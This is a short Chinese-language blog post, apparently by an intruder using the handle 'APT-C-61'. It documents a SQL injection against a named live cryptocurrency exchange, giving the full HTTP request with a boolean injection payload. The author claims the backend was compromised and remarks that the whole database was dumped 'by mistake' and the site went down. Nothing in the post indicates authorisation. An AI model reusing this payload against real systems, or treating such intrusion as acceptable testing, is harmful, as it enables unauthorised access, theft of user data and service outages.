对ftftx的渗透测试

loading...

APT-C-61

我曾于万丈深渊中见得永恒。

APT-C-61

对ftftx的渗透测试

Published in：2022-04-02 | category：实战渗透

目标：

前台地址：

FTFTX-全球数字货币交易所综合平台排行

漏洞地址：

SQL包情况：

GET /ad/queryAll?position=index%27and%27e%27%3D%27e HTTP/1.1
Host: pc.ftftx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US
Autho_token: undefined
Origin: https://www.ftftx.com
Referer: https://www.ftftx.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
X-Forwarded-For: 43.135.2.75
X-Forwarded-Host: pc.ftftx.com
X-Forwarded-Proto: https
X-Forwarded-Url: https://pc.ftftx.com/ad/queryAll?position=index
Accept-Encoding: gzip

后台攻破：

注：最后手误脱全裤站点死了

渗透测试实战渗透

author: ༺腾蛇༻
link: http://example.com/2022/04/02/对ftftx的渗透测试/
Copyright notice: All articles on this website, unless otherwise stated, adopt CC BY-NC-ND 4.0 reprint policy. If reproduced, please indicate source!

你的赏识是我前进的动力

支付宝

微信

catalog